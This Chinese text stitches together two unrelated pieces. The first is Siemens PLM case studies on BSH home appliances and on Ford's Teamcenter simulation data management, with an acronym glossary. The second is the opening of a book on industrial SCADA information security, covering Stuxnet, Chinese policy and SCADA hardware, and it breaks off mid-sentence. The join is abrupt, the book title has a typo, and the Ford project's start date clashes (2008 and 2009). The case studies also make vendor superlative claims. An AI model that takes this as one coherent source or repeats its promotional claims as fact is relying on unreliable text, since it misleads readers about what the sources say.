·实现了新产品开发流程和产品数据的通用化和高重用率。 ·实现整个产品开发过程的价值链同步。 ·提升了产品开发效率。 ·提高了产品质量。 ·降低了产品开发的成本。 家用消费品巨头博世和西门子家用电器集团(Bosch und Siemens Hausgerate GmbH,BSH)是一家全球化企业,在欧洲、亚洲、美国和拉丁美洲的15个国家经营了31个生产基地和43个工厂。BSH公司以知名品牌博世(Bosch)和西门子(Siemens)销售大小家用电器,也制造专业品牌产品,比如Gaggenau、Themador、Neff和Constructa以及各种地区品牌。 和其他行业一样,消费电子行业也面临着各种挑战: ·缩短产品上市时间; ·产品创新; ·产品复杂度提升; ·全球化。 为了与其他企业竞争,消费电子制造企业的第一要务是要使产品尽早上市,占据尽量大的市场份额,保证足够的利润,并具备足够的灵敏度来革新现有的产品。这对消费电子行业特别重要,因为消费电子的生命周期经常以月来计算。 产品创新是消费电子企业生存的关键。就消费电子产品的技术进步而言,摩尔(Moore)定理仍然有效,它对企业的创新形成了持续的压力。此外,竞争对手可以复制你的产品并提升产品的性能,这要求你根据竞争对手的产品变化不断地调整产品的研发目标。和其他行业不同,消费电子类新产品的利润窗口期是最短的,这意味着公司需要开发更多的新产品,尽量增强现有产品的性能以拓展其市场生命周期。它还需要获得最大的研发产出比并保护已有的研发成果。另外,随着软件已逐渐成为消费电子类产品构成的主要元素,往往只依赖软件就可快速地完成产品升级,从而可以让大量的制造过程和生产线保持不变。 产品的复杂度已经变得更高,总的趋势是一个产品中的组件数量将减少,而这些组件的复杂度、集成度和软件控制将升级到新的水平。大多数消费电子类产品已基于软件的功能来定义和区分产品的型号,因此研发必须对硬件、电子和软件等多个方面进行协同。为保证产品研发仍按预期顺利进行,需要做出的调整和变化也是很大的,这可能会给产品研发增加很多问题以及给供应链方面带来经济性风险。 全球化有两方面:首先,供应链获取组件的产品和制造能力(代工)更广泛,可以从遍及全球的公司寻找低成本、经过验证的组件。使用远程合作伙伴和供应商,需要更多努力才能有效合作,才能保证按计划进行并控制预算,减少浪费。第二,全球化也需要产品适应市场,公司可以继续寻求非国内市场的额外收入,但需要调整产品策略以满足市场的需要,需要考虑语言和法规差异、贸易协定和环境差异以及本地化文档等。 因此,非常自然地,BSH公司管理层把创新视为成功参与全球市场竞争的关键,并把目标定义为使BSH公司成为消费电子行业的领先创新者。公司每年申请300多项专利和商标,就是这种创新文化的明证。但是,目前BSH公司的创新概念不仅仅包括创造外观风格造型和高科技特征。为了改进产品和开发流程,BSH公司通过扩展的开发团队来一起实现协同工作,扩展的开发团队包括设计师、质量经理、采购和生产经理以及销售和营销人员。 “我们需要继续前进,比如从下游部门把知识反馈到研发之中,”BSH公司的产品开发和工业工程解决方案领导Uwe Tontsch表示,“因为BSH公司是一家全球化企业,这些人员通常距离很远。为了在这个全新层次上实现创新,需要一个全面且易于使用、涵盖整个组织的协同环境。” 全球市场的现实情况也要求在这种层次上进行创新。目前,这意味着降低产品开发成本,以便与具有更低劳动力成本的公司展开竞争。“我们面临的主要竞争来自亚洲和东欧,”Tonsch表示,“我们要有创新力,并不只是因为我们的竞争者会非常快速地紧跟我们,而且还因为我们必须降低费用,以便以客户期望的更低价格提供高质量的产品。” 可靠而强大的PLM合作伙伴 通过多年的收购,BSH公司已经发展壮大,她的经营从地理位置上看是十分分散的。早在20世纪90年代,公司管理层就意识到需要一个全球化的协同环境,使位于不同工作地点的设计师能够相互利用他们的工作成果。在评估了大量的领先系统之后,BSH公司在2000年决定将其全球范围内的开发工作标准建立在Siemens PLM Software的技术之上。之所以选择Siemens PLM Software作为合作伙伴,原因之一就是在数字化产品生命周期管理行业中,Siemens PLM Software是一个经过证明的全球领先者。“Siemens PLM Software的领先者地位降低了这次大型投资的风险。”Tontsch表示。 基于Teamcenter数字化产品生命周期管理解决方案、NX数字化设计分析系统以及Tecnomix数字化制造解决方案,BSH公司实施了一个端到端的PLM系统。“拥有端到端PLM解决方案的收益在于它使我们能够整合企业内的每一个成员,”BSH公司的Teamcenter Next Generation(新一代)项目经理Matthias Bronowski表示,“它允许我们全面了解产品情况。” 端到端PLM解决方案的另一个收益就是由供应商而不是BSH公司来完成应用程序之间的集成。“这是我们选择伙伴的一个关键因素,”Tonsch表示,“否则,我们将花费太多的工作来集成这些产品,而这将分散我们对业务的注意力。” 知识和数据的单一来源 BSH公司的产品开发战略涉及创建核心组件和技术,且经常需要对这些核心组件和技术加以调整和重用。这将驱使不管是集中型组织还是分散型组织,都必须在这些全球分散的团队以及通用系统之间协调,以支持数据共享而不需要数据转换。“系统之间的数据转换会扰乱时间进度,进而影响到业务。”Tonsch表示。 对此,BSH公司是深有体会的。在采用NX数字化设计分析系统之前,BSH拥有非常庞杂的设计软件工具,比如CADDS 5、Unigraphics、Pro/Engineer、Sigraph、Personal Designer、AutoCAD、SolidWorks、HP ME 10等。庞杂的应用软件工具给BSH公司的产品开发工作带来很多困惑,如软件培训学习、软件维护开发、数据共享、无价值的数据转换等。正如Tontsch说的那样,这扰乱了项目的时间进度,影响到业务的发展。 庞杂的设计软件工具 BSH将设计分析系统统一到Unigraphics(NX的前身)之后,产品开发应用软件和产品数据格式得到完全统一,消除了大量的、无效的数据转换工作,使得产品设计数据模型顺畅地从设计前端流动到工艺工装、NC数控加工以及维修服务等数据应用端,实现了全球范围内的设计知识和设计数据的共享和重用,从而优化了整个产品的开发流程,为BSH公司创造出巨大的价值,也为研究创建产品设计规范、建立统一客户化环境创造了良好的基础条件。 设计分析系统的统一 规范设计方法,保证数据正确传递和重用 NX数字化设计分析系统是集成产品设计、分析、工程与制造于一体的解决方案,帮助企业改善产品质量,提高产品交付速度和效率。毫无疑问,NX具备以下无可比拟的优势: ·唯一应用同步技术在开放环境下实现灵活设计的解决方案; ·唯一在开发流程中紧密集成多学科仿真的解决方案; ·唯一提供全系列先进零部件制造应用的解决方案; ·与世界领先的产品生命周期管理(PLM)平台Teamcenter实现无可比拟的紧密集成。 从这一点来说,NX无疑是BSH公司这样集产品设计、工艺规划、产品制造于一体的OEM企业的最佳选择。 但要使NX真正在产品开发过程中发挥其强大的作用,就必须要将NX功能与具体的产品结构、工艺制造特点相结合,通过研究产品的结构、工艺制造特点,制定符合产品开发要求的建模过程及规范要求,创建符合产品开发规范要求的客户化应用环境,并对广大的产品开发人员进行必要的培训,将研究获得的建模方法、建模规范等知识通过培训和项目导航传递给开发人员,才能真正发挥NX的效用。 对此,BSH公司有特别清醒和深刻的认识。因此,在整个BSH公司的PLM实施内容中包含了一系列内容,如基于Teamcenter环境的NX设计方法、设计规范、客户化环境建设以及应用工具开发等,也包含了非常完备的、大规模的NX培训和项目导航推广计划。 根据BSH公司的产品开发特点,在NX设计规范中特别强调通过规范引导以及强制检查手段来保证数据(三维模型、装配和图纸)的质量,从而保证数据在产品开发部门内部以及下游数据应用部门、外部供应商等协作方中得到充分的、反复的利用,减少无谓的差错和成本高昂的返工。 NX解决方案 完备的规范、充分的培训和现场指导使得NX在BSH公司得到了比较顺利的推广,并在应用的初期即获得了广大产品开发人员的肯定和赞誉。 宽广的产品线,实现设计分析、制造的一体化 正如大家所知,BSH公司是拥有从产品设计、工艺规划和生产制造等完整能力的企业,从对PLM系统选型开始,就特别关注消除从产品研发环节开始的数据流通壁垒,打造畅通的产品开发数据流。 在PLM系统的项目实施过程中,BSH公司不仅考虑了下游数据应用部门的需求,制定了产品开发设计部门的数据规范,还制定了一系列基于NX的CAE分析、工艺工装、NC CAM加工方面的应用规范和应用流程,并基于相应的应用规范和流程对NX应用环境做了大量的客户化定制工作,开发了一系列应用工具,真正实现了设计、分析、工艺工装和制造的一体化,达到了预期的项目目标! 数字化制造,提高规划和制造效率 Tecnomatix是综合性数字化制造解决方案系统。该解决方案把所有制造学科——从工艺布局规划和设计、工艺过程仿真与验证到制造执行——与产品工程连接起来,促进了全局创新。Tecnomatix建立在Teamcenter制造总线这个开放式产品生命周期管理(PLM)基础之上,是目前市场上功能最多的一套制造解决方案。 得益于前期PLM等项目的实施。BSH公司创建大量的、规范的NX三维产品、JT可视化和BOM数据,在此基础上成功地实施了数字化工厂的项目,主要包括以下内容: ·MTM Ticon和流程设计器以及相关的工作流程:变量配置管理,通过对相似产品的分组管理,降低其复杂性;运行管理,通过直接集成在流程建模的MTM分析确定其时间节拍;工作系统管理,通过定义操作过程,获得基于完整生产过程的知识,并使虚拟的规划以可视化的方式呈现;多方案管理,通过对不同产品、不同工人数量、不同操作时间和不同零件数量的研究,优化其规划方案;流水线平衡管理,通过工作台操作的分配定义产品系列,实现对客户需求的快速反应;报表生成和管理,包括流程规划报告、工单等。 ·BSH公司根据应用需求,对流程设计器做了相应的定制开发。 ·流程仿真、工厂仿真和冲压线仿真:通过对不同人体模型的人体功效分析,研究其可视性和可达性,在生产前评估其人体功效的安全性等。 BSH公司通过实施Tecnomatix数字化制造解决方案,达到了其提高规划效率和优化制造效率的目的。 CAE分析,提高产品的质量 在消费品的产品开发和创新实践中,CAE分析开始日渐占据重要的地位。通过应用NX数字化设计分析软件,BSH公司的产品设计师可以方便地进行运动和结构强度等方面的CAE分析。不仅如此,随着市场对消费品品质要求的提高,BSH公司也采用Siemens PLM Software的专业CAE解决一些特殊的分析问题,如声学分析等。 近几年来,市场上对洗碗机的噪声提出了更严格的要求。现在开放式的厨房不仅要求其功能完备、装饰精巧,也要求保持足够的安静。因此,洗碗机能够保持足够低的噪声水平成为高端品牌的关键性标志。Siemens PLM Software的LMS Test Lab Acoustics提供了一套完整的、独特的声学测试分析软件和硬件解决方案,涵盖了许多声学方面的应用,如声学测试、材料和组件的测试、声功率测试、声源定位和完善的质量检测。BSH公司可以在集成的软件环境和合理的工作流程中进行声学测量,这大大改善了声学研发效率,节省了大量的时间和精力。 “Siemens PLM Software帮助我们优化了洗碗机整体的声学性能,并通过对控制面板的声学识别处理减少了阻尼材料的用量,从而降低了生产成本。我们公司每年生产超过400万台洗碗机,使用较少的阻尼材料,意味着我们可以显著降低成本。”Schwenk先生这样表示。 “拥有信息的一个单一来源对BSH公司非常重要,因为现在没有关于什么是正确的以及什么是错误的疑问。只有一个答案,并且每个人都知道在哪里查找这个答案。”Matthias Bronowski这样表示。 案例十二 福特汽车公司利用Teamcenter仿真过程管理快速取得成效 CPDA设计与仿真委员会一直专注于仿真数据管理、过程管理以及CAE工作流自动化。该委员会的工作之一就是进行仿真数据管理和过程自动化的收益与挑战案例的研究。 福特汽车公司最近实施了基于Teamcenter的仿真过程管理解决方案。该方案很快就为公司的CAE模型开发过程带来了实效。2009年,福特汽车开始计划采用基于Teamcenter的仿真过程管理,并藉此取代公司的内部工具。2010年4月,这套系统完成了安装,并于当年5月投入生产。实施该系统的Teamcenter几乎无须定制,也无须花费很多精力配置,部分原因在于福特汽车公司在工具包应用方面有着丰富的经验。几个星期后,在CAE配置的创建和管理等几个关键步骤上,福特汽车公司的效率提高了4~8倍不等。网格开发团队经理Ulrich Fox博士把这些收益归功于Teamcenter更为丰富、功能更为强大的CAE项目处理数据模型,以及结构映射,它们为CAE模型配置的创建提供了帮助。 福特汽车公司取得成功的因素包括:明确的预期、良好的规划以及良好的厂商支持。福特汽车公司对集成化PLM工具包的收益愿景很明确。另外,新工具支持已确立下来的业务流程。这提高了系统部署成功的可能性,因为很多工程之所以失败,是由于它们不仅包含大量的新工具,而且这些工具的使用方法也发生了重大的变化。 由于各个公司都努力推进虚拟化或数字化的产品开发以及仿真驱动式设计,所以仿真数据管理需求就变得至关重要。很多公司的产品开发过程都包含若干阶段性关卡。因为产品开发过程被分为多个阶段,并在当前设计的每个阶段结束时进行评估。在进行阶段评审时,各项评估结束,同时决策产品下一步的开发方向。 基于物理学的CAE产品性能数字化仿真为各项评估提供了巨大支持。用于阶段性评审的设计数据发布后,CAE模型就必须被构建起来,同时,必须进行仿真分析。在这一过程中,CAE成为总体项目能够按时完成的关键。 从CAD模型生成CAE模型的过程非常困难。必须找到正确的设计版本和配置,并且必须将组件和装配的恰当描述传输给CAE团队。然后,必须对零件进行网格划分并连接,以便正确地描述检验过程中的系统或装配体。CAE模型可能根据工程专业和解算器技术被特例化,用于某一特殊类型的评估。必须对各种荷载情形进行计算,并在最后将仿真结果与产品性能要求进行比较。常见的问题主要包括: ·CAD模型到CAE模型的转化是手动完成的,并需要耗费大量时间。 ·完成一个CAE模型必须使用多个信息源的数据,而不仅仅是CAD图形数据。 ·CAE模型无法与CAD及其他数据源(“谱系”)连接,或这种连接无法得到验证。 ·产品性能要求与产品设计没有紧密结合。 ·几乎没有重用仿真模型和之前的成果。 很多时候都没有一种现成的系统架构能够将所有独立项目连接在一起。 解决方案供应商一直在开发用以解决上述问题的应用程序。根据CPDA的评估,这些用于仿真数据和过程管理(SDPM)的工具直到最近才充分发展成熟,足以显著影响仿真在产品开发过程中的地位。 Siemens PLM Software将Teamcenter的功能拓展到仿真数据管理,这就是Teamcenter for Simulation。福特汽车公司最近实施了基于Teamcenter的仿真过程管理,这很快就为CAE模型开发流程带来了实效。 福特欧洲公司的网格开发 在位于德国科隆的福特汽车公司欧洲工程中心,一个大约由十名专家组成的团队构建了“基线”有限元CAE模型,以便进行结构仿真,包括碰撞安全性、NVH(噪声、振动和舒适性)以及耐久性。该网格开发MD团队在福特欧洲大约有150名客户(不包括开发车型的全球客户)和CAE分析师。通用的基线模型被客户组采用后,会进一步调整以用于具体的CAE专业领域。供应商提供一部分分析模型内容,如座椅。 模型类型及创建人 目前,福特公司将CATIA作为主要的CAD系统,大多数产品图形数据为CATIA V5格式,某些数据为I-DEAS格式。PDM系统采用统一的Teamcenter。MD团队仅使用Beta CAE系统中的ANSA进行CAE前处理(在福特公司,除空气动力学之外的其他所有结构CAE基本上都采用Altair Engineering的ANSA和HyperMesh)。CAE基线模型数据与CAD PDM数据保存在同一个数据库中。这是一个可以全球共享的单一逻辑数据库。 福特公司的组织结构是矩阵式的。在这种组织结构下,无论是产品工程师还是性能属性工程师,均隶属于一个核心专家组。然后,公司会为工程师分派周期性汽车项目任务。MD团队仅为产品开发提供支持(但不会为诸如制造工程等提供支持)。福特公司拥有一套非常严格的全球产品开发流程——全球产品开发系统(GPDS),这是一套“阶段性关卡”流程。这套流程的起点是底盘开发。底盘是汽车结构的组成部分,是双门小轿车、轿车或货车等不同车型的共同之处。此时,这套流程作为共享技术平台使用。底盘设计完成之后,有很多开发特定车型的程序。车型(车身)可能会在全球其他工程中心开发,而且福特欧洲公司可能会为这些车型提供底盘CAE模型。 MD团队主要负责创建与项目的每个阶段相关联的基线模型。在开发过程中,如果有新的零件或设计变更,CAE功能团队会并行地做一些小的更改。如果出现会影响很多属性的较大变更,MD团队就会做出更改。开始时,他们会提供一个基线模型,然后,参与项目的CAE分析师就会做出更改,以便使该基线模型适用于他们的具体开发工作。 数据管理 自20世纪90年代的Metaphase开始,福特公司就一直在使用Teamcenter存储CAE数据。当公司将Teamcenter Engineering部署为PDM系统时,他们开始在Teamcenter中管理CAE数据,并使用了自定义工具支持这种数据管理方法。Teamcenter CAE数据的拷贝可被放置在一个共享驱动器上,这其中就包括了用以描述该模型的CAE BOM列表文件。原始信息仍留在Teamcenter中。 在当前的流程中,MD团队开发的数据全部保存在统一结构的Teamcenter中。将来,福特公司希望所有的下游模型都保存在Teamcenter中。当前,下游用户作为MD团队的客户,并未使用Teamcenter来保存他们的数据,他们将模型保存在一个共享驱动器(即NAS服务器)上,部分模型保存在本地UNIX驱动器或本地硬盘上。虽然有一套存储系统用以存储需长期保存的模型,但是没有单一的CAE数据存储流程。 实施Teamcenter仿真流程管理 MD团队多年来一直使用Teamcenter访问CAD数据并保存基线模型。他们已开发了自定义的内部工具,用以帮助他们创建并管理CAE配置,并实现与ANSA的连接。2009年,福特公司开始计划利用Teamcenter的仿真数据与流程管理功能。由于基于Teamcenter的内部解决方案确立已经有些时日了,所以实施该系统的一个重要目标是全面运用一种即装即用的解决方案,而非一种专用或专有的解决方案。福特公司希望利用的是软件供应商开发解决方案并提供专业支持的能力。此外,福特公司还利用自身之前使用内部工具时积累的一些经验,推进Teamcenter仿真过程管理功能需求。Fox博士说:“在很大程度上,那就是推动了Teamcenter仿真设计的根本所在。” 福特公司对该项目有三个特别的期望: ·第一,他们的目标是一种即装即用的数据模型。公司之前的解决方案是利用被用于各种目的的通用项,但是没有一套具有真正CAE项类型的CAE数据模型。福特公司的确成功地改进了数据模型,使之具有了需要的属性。 ·第二,他们需要支持CAE项类型的创建,并将它们与其他产品信息联系起来。也就是利用PDM工具实现数据比较和搜索等功能。 ·第三,需要支持与CAE应用程序(如前处理程序)的连接功能。PLM XML已被用于配置与ANSA的接口,ANSA现在可以读取Teamcenter CAE结构和相关的基础数据信息。ANSA还可以将数据存储到Teamcenter结构中。 当被问及公司在Teamcenter定制化与配置方面的工作量时,Fox博士回答说:“事实上,我们几乎不需要开展这方面的工作。我们需要一种即装即用的解决方案。”福特公司的需求很简单,例如,他们只为数据访问确定了两个角色(最初确定三个角色,但是第三个仍未被使用)。方法团队中的一位管理员创建一个非常高层的结构。对于具体的应用来说,团队分析师拥有在该结构内创建CAE装配和信息的权限。 对于终端用户来说,所需要的时间和工作量同样实现了最小化。他们只需要定义需求并根据业务流程正确地进行系统设置。Fox博士说:“多年来,我们一直使用Teamcenter完成这项工作,Siemens为我们提供了非常得力的现场支持。他们了解我们的业务,并知道我们应该完成哪些工作。他们的支持快速而高效。” 当被问及即装即用的功能以及配置系统所需的用户参与水平时,Fox博士回答说:“这一点我们必须考虑到。尽管功能是即装即用的,但是客户必须进行配置,以便使数据模型适合于他们的需求并与系统环境的其他部分相匹配。对于我们来说,在这方面投入的工作量很小。Siemens为我们派遣了一位经验非常丰富的专家。他很了解我们的流程,因此效率很高,并且几乎无须与技术专家面对面交流。我们在这方面投入工作量小的另一个原因是福特公司在工具包的使用方面具有丰富的经验。这可能会跟其他公司有所不同。” 当我们问到福特公司是否会考虑其他供应商和产品时,Fox博士回答说:“不会。长期以来我们一直与SDRC、UGS、EDS以及Siemens合作。我们自然将Siemens选为我们的PDM系统供应商。我们从一开始就有全面集成的构想。其他的供应商也积极地向我们展示了他们的产品。但是这些产品都无法为我们提供我们所期望从集成化的企业解决方案中获得的收益。” 部署和最初成果 正如上文所述,该项目始于2008年,并于2010年4月安装完成。目前,系统已投入使用,每一个授权的分析师都可以使用该系统。系统的首次生产部署是在2010年5月。通过简化数据结构,系统性能得以改进。同时,Teamcenter利用PLM XML进行编码的ANSA接口功能也得到改进。 以前,福特公司可以在Teamcenter内管理CAE BOM,并利用他们自己开发的工具对CAE BOM和CAD产品结构进行比较。现在,Teamcenter支持即装即用的功能以保持这种功能。Teamcenter的另一个特点是结构映射。结构映射使他们可以通过自动化方法,利用产品信息创建CAE信息。有各种模板可用于创建和自动连接CAE BOM内的数据项。 Fox博士对Teamcenter非常有信心,但也提及了一些Teamcenter 8的功能。这些功能在福特公司现有的Teamcenter 2007版本中是作为插件来实施的。他说:“我们仍在使用Teamcenter 2007,但是将部署Teamcenter 8。我们目前需要一些功能,而这些功能是通过PLM XML接口作为插件来提供的。另外在处理变换矩阵(将零件置于正确的位置)时碰到了一些小问题,这也需要插件。另一个插件通过隐藏项来调整结构。但是,目前还没有人为我们定制基本的Teamcenter代码。” 数据管理项目经常面临着来自于终端用户的阻力,但是福特公司并未遇到这种情况。福特公司的MD团队很熟悉Teamcenter,并且使用过之前的内部解决方案。Fox博士谈道:“他们很高兴使用这一新的工具包。尽管新工具包的一些变化需要他们学习,但这并未引起他们的抵触情绪。” 未来计划与愿景 福特公司正在分阶段地推广、应用这一系统。首先,他们已为MD团队部署了系统,以建立核心的专门技术。接下来,他们会将系统的应用推广到其他地点,比如印度,为CAE模型的构建工作提供支持。 第三个阶段是使他们的客户直接从Teamcenter中检索数据,而无须再从共享驱动器上检索数据。目前,他们将继续使用共享驱动器为客户提供数据。 当被问及利用Teamcenter处理过程数据中的CAE工作时,Fox博士回答说:“这是一个很好的问题。我们必须考虑CAE分析师的需求。如果可以在不影响他们的情况下完成这项工作,那么我们当然会去做。除此之外,他们可以从主要迭代,而非中间迭代的存储开始。” 使用Teamcenter的仿真管理功能,这一项目的起点是福特欧洲公司管理层的支持。目前,福特公司正在全球范围内部署这些功能,全球CAE总工程师非常支持实施这种功能。CPDA认为:该项目的基本推动因素是改进MD团队创建CAE模型过程的这一需求。在某种程度上,这种基本推动因素还包括改进客户接口。在初步实施阶段,他们没有设定更多的企业收益目标,比如向整个企业发布CAE数据。Fox博士说:“最初,我们关注的是CAE领域内的效率。在这个领域内,一套完全集成的系统就可以立即实现这种可能性。我们还希望在某些特定情况下利用这种系统。我们必须发展——如果初步的效率没有实现,就不能实现其他的目标。” 从工作组级别的应用入手,该项目将扩展到更多的用户和不同的客户。Fox博士继续说道:“你可以将诸如轻量化研究信息等附加到PDM系统,然后工程师就可以直接在PDM系统中查看设计成果。在某些情形下,这将是一项明显的收益。”下一个阶段就是与从来未使用过CAE数据管理的人员进行交流。我们需要通过最详细的细节说服他们使用这些工具,并向他们展示这一过程发挥作用的方式。一开始就达到了100%的效率,因此他们将测试每一个细节。到目前为止,他们很喜欢这套系统,并积极实施。 “使用这样一套系统为企业带来了收益,但它也必须提高个人生产力。系统必须能激发人的兴趣并且简单易用,同时为企业带来收益。管理层应尝试强制员工使用这种系统。如果系统未能提高个人生产力,该套系统将会被终止。” 将来,福特公司希望利用ANSA Task Manager在ANSA内部实现流程自动化。他们还计划实现与其他系统(比如测试与需求管理)间的数据交换与互动。 成功的因素 福特汽车公司已能够在短期内通过部署仿真数据管理(SDM)工具取得成功,而其他公司则需花费更多的时间,甚至失败。以下是福特汽车公司取得成功的一些因素: ·对PLM的愿景很清晰,战略也很明确。该项目开始只在一个工作团队中部署,目前福特公司正在全球部署此项目,并对该项目如何适应与长远计划融合有着清晰的认识。 ·成熟完善的业务流程。多年来,福特公司一直在使用内部工具处理很多相同的工作,用户无须显著地改变自己的工作流程。 ·熟悉的工具,最少的培训。多年来,MD团队一直在使用Teamcenter,添加仿真流程管理所需的再培训很少。 ·将实施的范围和期望值限制在一定范围内,以确保达到快速的收益示范效果。首次部署时,福特公司没有尝试将实施范围扩展到MD团队的工作之外。 ·良好的支持。Siemens的现场团队了解福特公司的需求并且具备了实施本项目的能力。 ·使用。福特公司在最小的实施成本和工作量条件下,成功地使用了一套即装即用的解决方案。 缩略语 CPS(Cyber-Physical Systems) 信息物理系统 CMM(Coordinate Measuring Machining) 三坐标测量机 CNC(Computer Numerical Control) 计算机数字控制 DFMA(Design for Manufacturing and Assembly) 面向制造和装配的设计 DM(Dimensional Management) 尺寸管理 DMSMS(Diminishing Manufacturing Sources and Material Shortages) 制造源萎缩和材料短缺 ERP(Enterprise Resource Planning) 企业资源规划 EWI(Electronic Work Instruction) 电子化作业指导(这里是指西门子工业软件提供的基于Web的在线作业指导软件系统) FAI(First Article Inspection) 首件检测 INCOSE(International Councilon Systems Engineering) 国际系统工程学会 KPC(Key Product Characteristics) 关键产品特性 KCC(Key Control Characteristics) 关键控制特性 MBE(Model-Based Enterprise) 基于模型的企业 MBe(Model-Based engineering) 基于模型的工程 MBD(Model-Based Definition) 基于模型的定义 MBD(Model-Based Driven) 基于模型驱动 MBI(Model Based Instruction) 基于模型的作业指导书 MBM(Model Based Manufacturing) 基于模型的数字化制造 MBSE(Model-Based System Engineering) 基于模型的系统工程 MBS(Model-Based Sustainment) 基于模型的维护 MBs(Model-Based Service) 基于模型的服务 MRO(Maintenance Repair Overhaul) 维护维修大修 MES(Manufacturing Execution System) 制造执行系统 NGMT(the Next Generation Manufacturing Technologies Initiative) 下一代制造技术计划 NX 西门子工业软件公司提供的计算机辅助设计、分析、制造一体化数字化产品研发解决方案 OEM(Original Equipment Manufacturer) 原始设备制造商 PF(Product Feature) 产品特征 PLM(Product Lifecycle Management) 产品生命周期管理 PMI(Product Manufacturing Information) 产品制造信息 SDM(Simulation Data Management) 仿真数据过程管理 SDPD(Systems-Driven Product Development)系统驱动的产品开发 SE(System Engineering) 系统工程 SPC(Statistical Process Control) 统计过程控制 SRM(Supplier Relationship Management) 供应商关系管理 TDM(Test Data Management) 试验数据过程管理 TDP(Technical Data Package) 技术数据包 TC (Teamcenter)西门子工业软件公司提供的数字化产品生命周期权力解决方案 TC Mobility 基于iPad等移动设备的Team-center软件模块 TECNOMATIX 西门子工业软件公司提供的数字化制造解决方案的品牌名称 VA(Variant Analysis) 变差分析 VM(Verification Management) 验证管理 VSA(Variation Simulation Analysis) 三维容差仿真分析
standards
工业SCADA系统信息安全拔术 20世纪60 年代以来,现代通信网络、计算机与控制技术已经逐渐 渗透到工业生产控制当中,使传统工业发生了翻天覆地的变化。工业监 视控制与数据采集(Supervisory Control And Data Acquisition,SCADA)系 统作为当代工业生产控制最重要的系统之一,广泛应用于各行各业,显 著提升了全球工业生产效率。工业 SCADA 系统是利用通信网络、计算 机与控制技术,远程对生产过程中的各种信息进行采集、传输、分析、处 理,进而对其实施优化控制、合理调度和有效管理,以达到提高生产效率 的一种先进的自动控制系统。随着技术的发展,工业 SCADA 系统已经 成为电力、水力、石油、天然气、交通运输及核工业等国家关键基础设施控制的基石。 网络化、智能化是现代工业 SCADA 系统的显著特点。然而,正是这 些特点将网络的固有脆弱性和攻击威胁引入了工业 SCADA 系统中。 2010年9月24日,伊朗核设施突然受到Stuxnet(国内译“震网”)病毒攻 击,导致其核设施不能按时运行。消息一出,立即引起全球性的轰动,这 是迄今为止报道的第一个针对工业 SCADA 系统的病毒,又称为“超级病 毒”、“超级工厂病毒”。至此,工业控制系统信息安全引起工业界的高 度关注,据美国权威工业安全事件信息库 RISI(Repository of Security In- cidents) 统计,截止2011年10月,全球已发生200 余起针对工业控制系 统的攻击事件。2011 年国家信息安全漏洞共享平台收录了100 多个对 我国影响广泛的工业控制系统软件安全漏洞,较2010年大幅增长近10 倍,涉及西门子等国内外知名工业控制系统制造商的产品,对正常生产秩序形成严重威胁。 目前,工业控制系统信息安全问题已经成为信息安全的焦点问题。工 业和信息化部2011年9月发布的《关于加强工业控制系统信息安全管理 的通知》([2011]451 号),在工业控制系统的设备选择与升级、接入方式、组网模式、参数配置、数据处理、应急管理等六个方面提出了明确的具体要求。 2012年6月国务院《关于大力推进信息化发展和切实保障信息安全的若干意见 (国发〔2012〕23号)》明确要求,对重点领域使用的关键产品开展安全测评,实行 安全风险和漏洞通报制度。为我国开展工业控制系统信息安全提供了政策基础。从总体上看,我国工业控制系统信息安全体系建设明显滞后于工业控制系统 建设,尤其是工业 SCADA系统信息安全在防护策略、防护机制、防护检测、技术标准等方面都存在不少问题,急需开展深入研究。 基于工业 SCADA 系统信息安全基础薄弱现状,作者结合多年在信息安全 和工业 SCADA 系统交叉研究的成果和技术应用实践,在本书中系统性总结了 工业 SCADA 系统信息安全技术的内涵、信息安全需求、信息安全目标、安全技 术体系及其相应的关键技术等内容,剖析了典型电力 SCADA 系统信息安全应用案例。 该书的出版恰逢全国范围内高度重视工业控制系统信息安全的时机,相信这 本书的出版能够给工业控制系统信息安全研究者提供有益的参考,有助于对工业控制系统信息安全更全面的认识,促进我国工业控制系统信息安全的研究与发展。 1.1 工业控制系统及 SCADA 系统概述 工业控制系统(Industrial Control Systems,ICS),是由各种自动化控制组件 以及对实时数据进行采集、监测的过程控制组件,共同构成的确保工业基础设施 自动化运行、过程控制与监控的业务流程管控系统。工业控制系统通常指的是 监视控制与数据采集系统(Supervisory Control And Data Acquisition,SCADA)、分 布式控制系统(Distributed Control System,DCS)、可编程逻辑控制器(Programma- ble Logic Controller,PLC)以及过程控制系统(Process Control System,PCS),如 图1.1所示。 工业控制系统 监视控制与数据采集系统 分布式控制系统 可编程逻辑控制器 过程控制系统 图1.1 工业控制系统一般组成 在整个工业控制网络技术体系中,基于SCADA 系统(监视控制和数据采集系 统)平台的控制网络是一种使用较为广泛的工业控制网络,其综合集成了计算机 网络、现代通信、微电子以及自动化技术,普遍应用于电力、供水、石油、天然气、轨 道交通、矿山作业和化学工业领域,是国家关键基础设施的重要组成部分,关系到 国家的战略安全。工业 SCADA 系统在工业控制领域具有一定代表性和典型 性,本书主要讨论工业 SCADA 系统的信息安全技术。 1.2 SCADA 系统概述 SCADA系统指的是监视控制与数据采集系统,它是一种大规模的分布式系 统,用来控制和管理地理位置广域分布的资产(Asset), 这些资产一般分散在数千 平方千米范围内。在工业生产过程当中,中央数据采集和集中控制对整个系统运 行来说非常重要,SCADA 系统通常完成这种能力,广泛应用在供水工程、污水处理 系统、石油和天然气管网、电力系统和轨道交通系统中。SCADA 控制中心集中监 视和控制远距离通信网络中的野外现场节点设备,包括告警信息和过程状态数据 等。中央控制中心依靠从远程站点获取的信息,生成自动化的或者过程驱动型的 监视指令并发送至远程站点,以实现对远程装置的实时控制,这类远程装置就是工 业领域的现场设备。现场设备操作类似阀门和断路器的开启/关闭、传感器数据采 集和现场环境监视报警等本地作业。 1.3 SCADA 系统硬件 SCADA 系统主要由一系列远方终端单元(RTU) 和中心控制主站系统组成, RTU 收集现场数据,并通过通信系统回送反馈数据给主站,主站显示这些采集到 的数据并允许操作员执行远程控制任务。 准确的、实时的数据可以用于优化机械设备的运行和操作工序。其他的优势 包括更高效、更可靠等,最重要的是还可以完成各类安全操作,由此可带来比早期 非自动化系统更低的运行成本。 更高级的 SCADA 系统包含基本的五个层次或等级: (1)现场层次的测量仪器、仪表和控制装置; (2)信号分组终端和RTU; (3)通信系统; (4)主站; (5)企业内部数据处理机构的后台计算机系统。 RTU 为分布于每一个远方位置的现场模拟传感器和数字传感器之间提供了 一种连接接口。 通信系统为主站系统和远方站点之间的通信提供了通道。这种通信系统可以 是电力线载波、光纤、短波\超短波、PSTN 电话线、微波甚至卫星通信。此外,专用 协议和纠错机制被设计来保证高效和最佳的数据传输。 主站(或分布式主站)从各种 RTU 